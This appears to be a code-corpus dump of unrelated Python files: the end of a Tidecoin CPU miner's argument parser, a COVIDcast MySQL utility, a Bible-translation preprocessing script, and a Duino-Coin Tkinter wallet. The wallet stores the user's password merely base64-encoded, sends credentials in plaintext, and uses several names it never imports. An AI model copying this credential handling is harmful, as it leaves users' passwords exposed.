"consider supporting its future development via "
"donating to one of the addresses indicated in the "
"README.md file")
parser.add_argument('-o', '--url', default="pool.tidecoin.exchange:3032", help='mining server url (eg: pool.tidecoin.exchange:3033)')
parser.add_argument('-u', '--user', dest='username', default='TSrAZcfyx8EZdzaLjV5ketPwtowgw3WUYw.default', help='username for mining server',
metavar="USERNAME")
parser.add_argument('-t', '--threads', dest='threads', default=cpu_count(), help='count threads',
metavar="USERNAME")
parser.add_argument('-p', '--password', dest='password', default='password', help='password',
metavar="USERNAME")
options = parser.parse_args(sys.argv[1:])
miner(options.username, options.url.split(":")[0], int(options.url.split(":")[1]), int(options.threads), options.password)
|
database.py
|
"""A utility class that handles database operations related to covidcast.
See src/ddl/covidcast.sql for an explanation of each field.
"""
# third party
import json
import mysql.connector
import numpy as np
from math import ceil
from queue import Queue, Empty
import threading
from multiprocessing import cpu_count
# first party
import delphi.operations.secrets as secrets
class CovidcastRow():
"""A container for all the values of a single covidcast row."""
@staticmethod
def fromCsvRowValue(row_value, source, signal, time_type, geo_type, time_value, issue, lag, is_wip):
if row_value is None: return None
return CovidcastRow(source, signal, time_type, geo_type, time_value,
row_value.geo_value,
row_value.value,
row_value.stderr,
row_value.sample_size,
issue, lag, is_wip)
@staticmethod
def fromCsvRows(row_values, source, signal, time_type, geo_type, time_value, issue, lag, is_wip):
# NOTE: returns a generator, as row_values is expected to be a generator
return (CovidcastRow.fromCsvRowValue(row_value, source, signal, time_type, geo_type, time_value, issue, lag, is_wip)
for row_value in row_values)
def __init__(self, source, signal, time_type, geo_type, time_value, geo_value, value, stderr, sample_size, issue, lag, is_wip):
self.id = None
self.source = source
self.signal = signal
self.time_type = time_type
self.geo_type = geo_type
self.time_value = time_value
self.geo_value = geo_value # from CSV row
self.value = value # ...
self.stderr = stderr # ...
self.sample_size = sample_size # from CSV row
self.direction_updated_timestamp = 0
self.direction = None
self.issue = issue
self.lag = lag
self.is_wip = is_wip
class Database:
"""A collection of covidcast database operations."""
DATABASE_NAME = 'epidata'
def connect(self, connector_impl=mysql.connector):
"""Establish a connection to the database."""
u, p = secrets.db.epi
self._connector_impl = connector_impl
self._connection = self._connector_impl.connect(
host=secrets.db.host,
user=u,
password=p,
database=Database.DATABASE_NAME)
self._cursor = self._connection.cursor()
def commit(self):
self._connection.commit()
def rollback(self):
self._connection.rollback()
def disconnect(self, commit):
"""Close the database connection.
commit: if true, commit changes, otherwise rollback
"""
self._cursor.close()
if commit:
self._connection.commit()
self._connection.close()
def count_all_rows(self):
"""Return the total number of rows in table `covidcast`."""
self._cursor.execute('SELECT count(1) FROM `covidcast`')
for (num,) in self._cursor:
return num
def insert_or_update_bulk(self, cc_rows):
return self.insert_or_update_batch(cc_rows)
def insert_or_update_batch(self, cc_rows, batch_size=2**20, commit_partial=False):
"""
Insert new rows (or update existing) in the `covidcast` table.
This has the intentional side effect of updating the primary timestamp.
"""
tmp_table_name = 'tmp_insert_update_table'
# TODO: this heavily copypastas src/ddl/covidcast.sql -- theres got to be a better way
create_tmp_table_sql = f'''
CREATE TABLE `{tmp_table_name}` (
`source` varchar(32) NOT NULL,
`signal` varchar(64) NOT NULL,
`time_type` varchar(12) NOT NULL,
`geo_type` varchar(12) NOT NULL,
`time_value` int(11) NOT NULL,
`geo_value` varchar(12) NOT NULL,
`value_updated_timestamp` int(11) NOT NULL,
`value` double NOT NULL,
`stderr` double,
`sample_size` double,
`direction_updated_timestamp` int(11) NOT NULL,
`direction` int(11),
`issue` int(11) NOT NULL,
`lag` int(11) NOT NULL,
`is_latest_issue` BINARY(1) NOT NULL,
`is_wip` BINARY(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
'''
truncate_tmp_table_sql = f'TRUNCATE TABLE {tmp_table_name};'
drop_tmp_table_sql = f'DROP TABLE {tmp_table_name}'
insert_into_tmp_sql = f'''
INSERT INTO `{tmp_table_name}`
(`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`,
`value_updated_timestamp`, `value`, `stderr`, `sample_size`, `direction_updated_timestamp`, `direction`,
`issue`, `lag`, `is_latest_issue`, `is_wip`)
VALUES
(%s, %s, %s, %s, %s, %s, UNIX_TIMESTAMP(NOW()), %s, %s, %s, 0, NULL, %s, %s, 0, %s)
'''
insert_or_update_sql = f'''
INSERT INTO `covidcast`
(`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`,
`value_updated_timestamp`, `value`, `stderr`, `sample_size`, `direction_updated_timestamp`, `direction`,
`issue`, `lag`, `is_latest_issue`, `is_wip`)
SELECT * FROM `{tmp_table_name}`
ON DUPLICATE KEY UPDATE
`value_updated_timestamp` = VALUES(`value_updated_timestamp`),
`value` = VALUES(`value`),
`stderr` = VALUES(`stderr`),
`sample_size` = VALUES(`sample_size`)
'''
zero_is_latest_issue_sql = f'''
UPDATE
(
SELECT DISTINCT `source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`
FROM `{tmp_table_name}`
) AS TMP
LEFT JOIN `covidcast`
USING (`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`)
SET `is_latest_issue`=0
'''
set_is_latest_issue_sql = f'''
UPDATE
(
SELECT `source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`, MAX(`issue`) AS `issue`
FROM
(
SELECT DISTINCT `source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`
FROM `{tmp_table_name}`
) AS TMP
LEFT JOIN `covidcast`
USING (`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`)
GROUP BY `source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`
) AS TMP
LEFT JOIN `covidcast`
USING (`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`, `issue`)
SET `is_latest_issue`=1
'''
# TODO: consider handling cc_rows as a generator instead of a list
self._cursor.execute(create_tmp_table_sql)
try:
num_rows = len(cc_rows)
total = 0
if not batch_size:
batch_size = num_rows
num_batches = ceil(num_rows/batch_size)
for batch_num in range(num_batches):
start = batch_num * batch_size
end = min(num_rows, start + batch_size)
length = end - start
args = [(
row.source,
row.signal,
row.time_type,
row.geo_type,
row.time_value,
row.geo_value,
row.value,
row.stderr,
row.sample_size,
row.issue,
row.lag,
row.is_wip
) for row in cc_rows[start:end]]
self._cursor.executemany(insert_into_tmp_sql, args)
self._cursor.execute(insert_or_update_sql)
modified_row_count = self._cursor.rowcount
self._cursor.execute(zero_is_latest_issue_sql)
self._cursor.execute(set_is_latest_issue_sql)
self._cursor.execute(truncate_tmp_table_sql)
if modified_row_count is None or modified_row_count == -1:
# the SQL connector does not support returning number of rows affected (see PEP 249)
total = None
else:
total += modified_row_count
if commit_partial:
self._connection.commit()
except Exception as e:
raise e
finally:
self._cursor.execute(drop_tmp_table_sql)
return total
def get_covidcast_meta(self):
"""Compute and return metadata on all non-WIP COVIDcast signals."""
n_threads = max(1, cpu_count()*9//10) # aka number of concurrent db connections, which [sh|c]ould be ~<= 90% of the #cores available to SQL server
# NOTE: this may present a small problem if this job runs on different hardware than the db,
# but we should not run into that issue in prod.
srcsigs = Queue() # multi-consumer threadsafe!
sql = 'SELECT `source`, `signal` FROM `covidcast` GROUP BY `source`, `signal` ORDER BY `source` ASC, `signal` ASC;'
self._cursor.execute(sql)
for source, signal in list(self._cursor): # self._cursor is a generator; this lets us use the cursor for subsequent queries inside the loop
sql = "SELECT `is_wip` FROM `covidcast` WHERE `source`=%s AND `signal`=%s LIMIT 1"
self._cursor.execute(sql, (source, signal))
is_wip = int(self._cursor.fetchone()[0]) # casting to int as it comes out as a '0' or '1' bytearray; bool('0')==True :(
if not is_wip:
srcsigs.put((source, signal))
inner_sql = '''
SELECT
t.`source` AS `data_source`,
t.`signal`,
t.`time_type`,
t.`geo_type`,
MIN(t.`time_value`) AS `min_time`,
MAX(t.`time_value`) AS `max_time`,
COUNT(DISTINCT t.`geo_value`) AS `num_locations`,
MIN(`value`) AS `min_value`,
MAX(`value`) AS `max_value`,
ROUND(AVG(`value`),7) AS `mean_value`,
ROUND(STD(`value`),7) AS `stdev_value`,
MAX(`value_updated_timestamp`) AS `last_update`,
MAX(`issue`) as `max_issue`,
MIN(`lag`) as `min_lag`,
MAX(`lag`) as `max_lag`
FROM
`covidcast` t
WHERE
`source` = %s AND
`signal` = %s AND
is_latest_issue = 1
GROUP BY
t.`time_type`,
t.`geo_type`
ORDER BY
t.`time_type` ASC,
t.`geo_type` ASC
'''
meta = []
meta_lock = threading.Lock()
def worker():
print("starting thread: " + threading.current_thread().name)
# set up new db connection for thread
worker_dbc = Database()
worker_dbc.connect(connector_impl=self._connector_impl)
w_cursor = worker_dbc._cursor
try:
while True:
(source, signal) = srcsigs.get_nowait() # this will throw the Empty caught below
w_cursor.execute(inner_sql, (source, signal))
with meta_lock:
meta.extend(list(
dict(zip(w_cursor.column_names, x)) for x in w_cursor
))
srcsigs.task_done()
except Empty:
print("no jobs left, thread terminating: " + threading.current_thread().name)
finally:
worker_dbc.disconnect(False) # cleanup
threads = []
for n in range(n_threads):
t = threading.Thread(target=worker, name='MetacacheThread-'+str(n))
t.start()
threads.append(t)
srcsigs.join()
print("jobs complete")
for t in threads:
t.join()
print("threads terminated")
# sort the metadata because threaded workers dgaf
sorting_fields = "data_source signal time_type geo_type".split()
sortable_fields_fn = lambda x: [(field, x[field]) for field in sorting_fields]
prepended_sortables_fn = lambda x: sortable_fields_fn(x) + list(x.items())
tuple_representation = list(map(prepended_sortables_fn, meta))
tuple_representation.sort()
meta = list(map(dict, tuple_representation)) # back to dict form
return meta
def update_covidcast_meta_cache(self, metadata):
"""Updates the `covidcast_meta_cache` table."""
sql = '''
UPDATE
`covidcast_meta_cache`
SET
`timestamp` = UNIX_TIMESTAMP(NOW()),
`epidata` = %s
'''
epidata_json = json.dumps(metadata)
self._cursor.execute(sql, (epidata_json,))
def retrieve_covidcast_meta_cache(self):
"""Useful for viewing cache entries (was used in debugging)"""
sql = '''
SELECT `epidata`
FROM `covidcast_meta_cache`
ORDER BY `timestamp` DESC
LIMIT 1;
'''
self._cursor.execute(sql)
cache_json = self._cursor.fetchone()[0]
cache = json.loads(cache_json)
cache_hash = {}
for entry in cache:
cache_hash[(entry['data_source'], entry['signal'], entry['time_type'], entry['geo_type'])] = entry
return cache_hash
|
prepare_bible.py
|
#!/usr/bin/env python3
from subprocess import run
from threading import Thread
import os
import shutil
import sys
import osis_tran
SCRIPTS = 'mosesdecoder/scripts'
TOKENIZER = SCRIPTS + '/tokenizer/tokenizer.perl'
CLEAN = SCRIPTS + '/training/clean-corpus-n.perl'
BPEROOT = 'subword-nmt'
BPE_TOKENS = 30000
CLEAN_RATIO = 1.5
PREP = 'bible.prep'
TMP = PREP + '/tmp'
BPE_CODE = PREP + '/code'
# starts with * --> unidecode
MODULES = [
'*2TGreek', 'Afr1953', 'Alb', 'BasHautin', '*Bela', 'BretonNT', '*BulVeren',
'*CSlElizabeth', 'Chamorro', '*ChiNCVs', 'Cro', 'CzeCEP', 'DaOT1931NT1907',
'*Dari', 'DutSVV', 'ESV2011', 'Esperanto', 'Est', '*FarTPV', 'FrePGR',
'FinPR', 'GerNeUe', '*GreVamvas', 'Haitian', '*HebModern', '*HinERV',
'HunUj', 'ItaRive', 'Kekchi', '*KorHKJV', 'LtKBB', 'LvGluck8', 'ManxGaelic',
'Maori', 'Mg1865', 'Norsk', 'NorthernAzeri', '*Peshitta', 'PolUGdanska',
'PorAlmeida1911', 'PotLykins', 'RomCor', '*RusSynodal', 'ScotsGaelic',
'SloStritar', 'SomKQA', 'SpaRV', 'Swahili', 'SweFolk1998', 'TagAngBiblia',
'TurHADI', '*Ukrainian', 'Vulgate'
]
TRAIN_STARTS = {
'ESV2011': 'Matt.',
'FinPR': 'Exod.',
'GerNeUe': 'Exod.'
}
SRC_TOKEN_EXTRA_WEIGHT = 2
TARGET_EXTRA_PASSES = 2
TARGETS = list(TRAIN_STARTS)
SRC='2TGreek'
GLOSSARIES = ['TGT_' + m.lstrip('*') for m in MODULES] + ['TGT_TEMPLATE']
def apply_bpe(fname):
with open(TMP + '/' + fname) as inf:
with open(PREP + '/' + fname, 'w') as outf:
CMD = (['python', BPEROOT+'/apply_bpe.py', '--glossaries'] + GLOSSARIES +
['-c', BPE_CODE])
run(CMD, stdin=inf, stdout=outf, check=True)
def main():
modnames = [x.lstrip('*') for x in MODULES]
assert SRC in modnames
assert not (set(TRAIN_STARTS) - set(modnames)), (set(TRAIN_STARTS) - set(modnames))
assert not (set(TARGETS) - set(modnames)), (set(TARGETS) - set(modnames))
shutil.rmtree(PREP, ignore_errors=True)
os.mkdir(PREP)
os.mkdir(TMP)
if not os.path.exists('mosesdecoder'):
print('ERROR: Directory "mosesdecoder" does not exist.', file=sys.stderr)
print('Did you git clone without --recurse-submodules?', file=sys.stderr)
sys.exit(1)
train_mods = {}
val_mods = {}
print('Loading modules...')
for m in MODULES:
print(m, end=' ', flush=True)
decode = False
if m[0] == '*':
decode = True
m = m[1:]
train_mod = osis_tran.load_osis_module(m, toascii=decode)
if m in TRAIN_STARTS:
val_mod, train_mod = osis_tran.split_at_key(TRAIN_STARTS[m], train_mod)
val_mods[m] = val_mod
train_mods[m] = train_mod
print()
src_mod = train_mods[SRC]
del train_mods[SRC]
src_data = []
tgt_data = []
for tgt_mod in train_mods:
passes = 1
if tgt_mod in TARGETS:
passes += TARGET_EXTRA_PASSES
for i in range(passes):
for src_line, tgt_line in osis_tran.gen_trans(src_mod, train_mods[tgt_mod]):
src_data.append('TGT_' + tgt_mod + ' ' + src_line)
tgt_data.append(tgt_line)
val_src_data = []
val_tgt_data = []
for tgt_mod in val_mods:
for src_line, tgt_line in osis_tran.gen_trans(src_mod, val_mods[tgt_mod]):
val_src_data.append('TGT_' + tgt_mod + ' ' + src_line)
val_tgt_data.append(tgt_line)
print('Preprocessing train data...')
with open(TMP + '/protect', 'w') as f:
print('TGT_[a-zA-Z0-9]+', file=f)
# For BPE, learn source language only 1+SRC_TOKEN_EXTRA_WEIGHT times.
with open(TMP + '/src-once', 'w') as f:
for i in range(1+SRC_TOKEN_EXTRA_WEIGHT):
print('\n'.join(src_mod.values()), file=f)
# Also create a file for the source exactly once - it's useful down the road
src_template = ['TGT_TEMPLATE ' + x for x in src_mod.values()]
for data, fname in [(src_data, 'tok.src'), (tgt_data, 'tok.tgt'),
(val_src_data, 'val.src'), (val_tgt_data, 'val.tgt'),
(src_template, 'src-template')]:
CMD = ['perl', TOKENIZER, '-threads', '8', '-protected',
TMP+'/protect', '-l', 'nosuchlanguage']
with open(TMP + '/' + fname, 'w') as f:
run(CMD, input='\n'.join(data), stdout=f, check=True, encoding='utf-8')
for s, d in [('tok', 'train'), ('val', 'valid')]:
CMD = ['perl', CLEAN, '-ratio', str(CLEAN_RATIO), TMP+'/'+s, 'src', 'tgt',
TMP + '/' + d, '1', '175']
run(CMD, check=True)
run('cat {tmp}/src-once {tmp}/train.tgt >{tmp}/train.both'.format(tmp=TMP),
shell=True, check=True)
print('Learning BPE...')
with open(TMP + '/train.both') as inf:
with open(BPE_CODE, 'w') as outf:
run(['python', BPEROOT + '/' + 'learn_bpe.py', '-s', str(BPE_TOKENS)],
stdin=inf, stdout=outf, check=True)
threads = []
for l in ('src', 'tgt'):
for s in ('train', 'valid'):
fname = s + '.' + l
print('apply_bpe.py to ' + fname + '...')
th = Thread(target=apply_bpe, args=[fname])
th.start()
threads.append(th)
print('apply_bpe.py to src-template...')
th = Thread(target=apply_bpe, args=['src-template'])
th.start()
threads.append(th)
for t in threads:
t.join()
# FIXME proper test set
shutil.copy(PREP + '/valid.src', PREP + '/test.src')
shutil.copy(PREP + '/valid.tgt', PREP + '/test.tgt')
if __name__ == '__main__':
main()
|
Wallet.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Tkinter GUI Wallet (v2.4)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
import sys
from base64 import b64decode, b64encode
from configparser import ConfigParser
from datetime import datetime
from json import loads
from json import loads as jsonloads
from locale import getdefaultlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from socket import socket
from sqlite3 import connect as sqlconn
from subprocess import check_call
from threading import Thread, Timer
from time import sleep, time
from tkinter import (BOTH, END, LEFT, RIGHT, Button, Checkbutton, E, Entry,
Frame, IntVar, Label, Listbox, N, PhotoImage, S,
Scrollbar, StringVar, Tk, Toplevel, W, messagebox, ttk)
from tkinter.font import Font
from urllib.request import urlopen, urlretrieve
from webbrowser import open_new_tab
from requests import get
# Version number
VERSION = 2.4
# Colors
BACKGROUND_COLOR = "#121212"
FONT_COLOR = "#fffdee"
FOREGROUND_COLOR = "#ff9f43"
FOREGROUND_COLOR_SECONDARY = "#fdcb6e"
# Minimum transaction amount to be saved
MIN_TRANSACTION_VALUE = 0.00000000001
# Minimum transaction amount to show a notification
MIN_TRANSACTION_VALUE_NOTIFY = 0.5
# Resources folder location
resources = "Wallet_" + str(VERSION) + "_resources/"
ENCRYPTION_ITERATIONS = 100_000
config = ConfigParser()
wrong_passphrase = False
global_balance = 0
oldbalance = 0
balance = 0
unpaid_balance = 0
profitCheck = 0
curr_bal = 0
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, *sys.argv)
def get_duco_price():
global duco_fiat_value
jsonapi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if jsonapi.status_code == 200:
try:
content = jsonapi.content.decode()
contentjson = loads(content)
duco_fiat_value = round(float(contentjson["Duco price"]), 4)
except Exception:
duco_fiat_value = 0.003
else:
duco_fiat_value = 0.003
Timer(30, get_duco_price).start()
def title(title):
if osname == "nt":
system("title " + title)
else:
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def _derive_key(
password: bytes,
salt: bytes,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=ENCRYPTION_ITERATIONS,
backend=backend)
return b64e(kdf.derive(password))
def password_encrypt(
message: bytes,
password: str,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
salt = secrets.token_bytes(16)
key = _derive_key(
password.encode(),
salt,
ENCRYPTION_ITERATIONS)
return b64e(
b"%b%b%b" % (
salt,
ENCRYPTION_ITERATIONS.to_bytes(4, "big"),
b64d(Fernet(key).encrypt(message))))
def password_decrypt(
token: bytes,
password: str) -> bytes:
decoded = b64d(token)
salt, ENCRYPTION_ITERATIONS, token = decoded[:16], decoded[16:20], b64e(
decoded[20:])
ENCRYPTION_ITERATIONS = int.from_bytes(ENCRYPTION_ITERATIONS, "big")
key = _derive_key(
password.encode(),
salt,
ENCRYPTION_ITERATIONS)
return Fernet(key).decrypt(token)
def get_string(string_name):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def openTos(handler):
open_new_tab("https://github.com/revoxhere/duino-coin#terms-of-usage")
def openGitHub(handler):
open_new_tab("https://github.com/revoxhere/duino-coin")
def openWebsite(handler):
open_new_tab("https://duinocoin.com")
def openExchange(handler):
open_new_tab("https://revoxhere.github.io/duco-exchange/")
def openDiscord(handler):
open_new_tab("https://discord.com/invite/kvBkccy")
def openTransaction(hashToOpen):
open_new_tab("https://explorer.duinocoin.com/?search="+str(hashToOpen))
class LoginFrame(Frame):
def __init__(self, master):
super().__init__(master)
master.title("Login")
master.resizable(False, False)
TEXT_FONT_BOLD = Font(size=12, weight="bold")
TEXT_FONT = Font(size=12, weight="normal")
self.duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
self.duco.image = self.duco
self.ducoLabel = Label(
self, background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=self.duco)
self.ducoLabel2 = Label(
self,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("welcome_message"),
font=TEXT_FONT_BOLD)
self.spacer = Label(self)
self.label_username = Label(
self,
text=get_string("username"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.label_password = Label(
self,
text=get_string("passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.entry_username = Entry(
self,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.entry_password = Entry(
self,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.ducoLabel.grid(
row=0,
sticky="nswe",
pady=(5, 0),
padx=(5))
self.ducoLabel2.grid(
row=1,
sticky="nswe",
padx=(5))
self.label_username.grid(
row=4,
sticky=W,
pady=(5, 0))
self.entry_username.grid(
row=5,
sticky=N,
padx=(5))
self.label_password.grid(
row=6,
sticky=W)
self.entry_password.grid(
row=7,
sticky=N)
self.logbtn = Button(
self,
text=get_string("login"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._login_btn_clicked,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(5, 1))
self.regbtn = Button(
self,
text=get_string("register"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._register_btn_clicked,
font=TEXT_FONT_BOLD)
self.regbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(0, 5))
self.configure(background=BACKGROUND_COLOR)
self.master.bind(
"<Return>",
self._login_btn_clicked_bind)
self.pack()
def _login_btn_clicked_bind(self, event):
self._login_btn_clicked()
def _login_btn_clicked(self):
global username, password
username = self.entry_username.get()
password = self.entry_password.get()
if username and password:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv(64).decode("utf8").rstrip("\n")
response = response.split(",")
if response[0] == "OK":
passwordEnc = b64encode(bytes(password, encoding="utf8"))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO
UserData(username, password, useWrapper)
VALUES(?, ?, ?)""",
(username, passwordEnc, "False"))
con.commit()
root.destroy()
else:
messagebox.showerror(
title=get_string("login_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("login_error"),
message=get_string("fill_the_blanks_warning"))
def _registerprotocol(self):
emailS = email.get()
usernameS = username.get()
passwordS = password.get()
confpasswordS = confpassword.get()
if emailS and usernameS and passwordS and confpasswordS:
if passwordS == confpasswordS:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(
bytes(
"REGI,"
+ str(usernameS)
+ ","
+ str(passwordS)
+ ","
+ str(emailS),
encoding="utf8"))
response = soc.recv(128).decode("utf8").rstrip("\n")
response = response.split(",")
if response[0] == "OK":
messagebox.showinfo(
title=get_string("registration_success"),
message=get_string("registration_success_msg"))
register.destroy()
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("register_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("fill_the_blanks_warning"))
def _register_btn_clicked(self):
global username, password, confpassword, email, register
root.destroy()
register = Tk()
register.title(get_string("register"))
register.resizable(False, False)
TEXT_FONT_BOLD = Font(
register,
size=12,
weight="bold")
TEXT_FONT = Font(
register,
size=12,
weight="normal")
tos_warning = get_string("register_tos_warning")
import textwrap
tos_warning = textwrap.dedent(tos_warning)
tos_warning = "\n".join(l for line in tos_warning.splitlines()
for l in textwrap.wrap(line, width=20))
duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
duco.image = duco
ducoLabel = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=duco)
ducoLabel.grid(
row=0,
padx=5,
pady=(5, 0),
sticky="nswe")
ducoLabel2 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("register_on_network"),
font=TEXT_FONT_BOLD)
ducoLabel2.grid(row=1,
padx=5,
sticky="nswe")
def colorLabelBlue(handler):
ducoLabel3.configure(foreground="#6c5ce7")
def colorLabelNormal(handler):
ducoLabel3.configure(foreground=FONT_COLOR)
ducoLabel3 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=tos_warning,
font=TEXT_FONT)
ducoLabel3.grid(
row=2,
padx=5,
sticky="nswe")
ducoLabel3.bind("<Button-1>", openTos)
ducoLabel3.bind("<Enter>", colorLabelBlue)
ducoLabel3.bind("<Leave>", colorLabelNormal)
Label(
register,
text=get_string("username").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=3,
sticky=W,
padx=5,
pady=(5, 0))
username = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
username.grid(
row=4,
padx=5)
Label(
register,
text=get_string("passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=5,
sticky=W,
padx=5)
password = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
password.grid(
row=6,
padx=5)
Label(
register,
text=get_string("confirm_passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=7,
sticky=W,
padx=5)
confpassword = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
confpassword.grid(
row=8,
padx=5)
Label(
register,
text=get_string("email").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=9,
sticky=W,
padx=5)
email = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
email.grid(
row=10,
padx=5)
self.logbtn = Button(
register,
text=get_string("register"),
activebackground=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
command=self._registerprotocol,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5, 5),
pady=(5, 5))
register.configure(background=BACKGROUND_COLOR)
def loading_window():
global loading, status
loading = Tk()
loading.resizable(False, False)
loading.configure(background=BACKGROUND_COLOR)
loading.title(get_string("loading"))
try:
loading.iconphoto(True,
PhotoImage(file=resources + "duco_color.png"))
except Exception:
pass
TEXT_FONT = Font(loading,
size=10,
weight="bold")
TEXT_FONT_BOLD = Font(loading,
size=14,
weight="bold")
original = Image.open(resources + "duco_color.png")
resized = original.resize((128, 128), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(loading,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(row=0,
column=0,
sticky=N + S + E + W,
pady=(5, 0),
padx=(5))
Label(
loading,
text=get_string("duino_coin_wallet"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=1,
column=0,
sticky=S + W,
pady=(5, 0),
padx=5)
loading.update()
status = Label(
loading,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("loading_database"),
font=TEXT_FONT)
status.grid(
row=2,
column=0,
sticky=S + W,
pady=(0, 5),
padx=5)
loading.update()
def transactions_window(handler):
transactionsWindow = Toplevel()
transactionsWindow.resizable(False, False)
transactionsWindow.title(get_string("wallet_transactions"))
transactionsWindow.transient([root])
transactionsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
transactionsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
transactionsWindow,
size=12,
weight="normal")
Label(
transactionsWindow,
text=get_string("transaction_list"),
font=TEXT_FONT_BOLD_LARGE,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
Label(
transactionsWindow,
text=get_string("transaction_list_notice"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
listbox = Listbox(
transactionsWindow,
width="35",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
listbox.grid(
row=2,
column=0,
sticky=S + W + N + E,
padx=(5, 0),
pady=(0, 5))
scrollbar = Scrollbar(transactionsWindow,
background=BACKGROUND_COLOR)
scrollbar.grid(
row=2,
column=1,
sticky=N + S,
padx=(0, 5),
pady=(0, 5))
for i in gtxl:
listbox.insert(END, gtxl[i]["Sender"] + " to " + gtxl[i]
["Recipient"] + ": " + str(gtxl[i]["Amount"]) + " DUCO")
def get_selection(event):
try:
selection = listbox.curselection()[0]
openTransaction(gtxl[str(selection)]["Hash"])
except IndexError:
pass
listbox.bind("<Button-1>", get_selection)
listbox.config(yscrollcommand=scrollbar.set, font=TEXT_FONT)
scrollbar.config(command=listbox.yview)
def currency_converter_calc():
fromcurrency = fromCurrencyInput.get(fromCurrencyInput.curselection())
tocurrency = toCurrencyInput.get(toCurrencyInput.curselection())
amount = amountInput.get()
# TODO
value = duco_fiat_value * float(amount)
result = get_string("result") + ": " + str(round(value, 6))
conversionresulttext.set(str(result))
calculatorWindow.update()
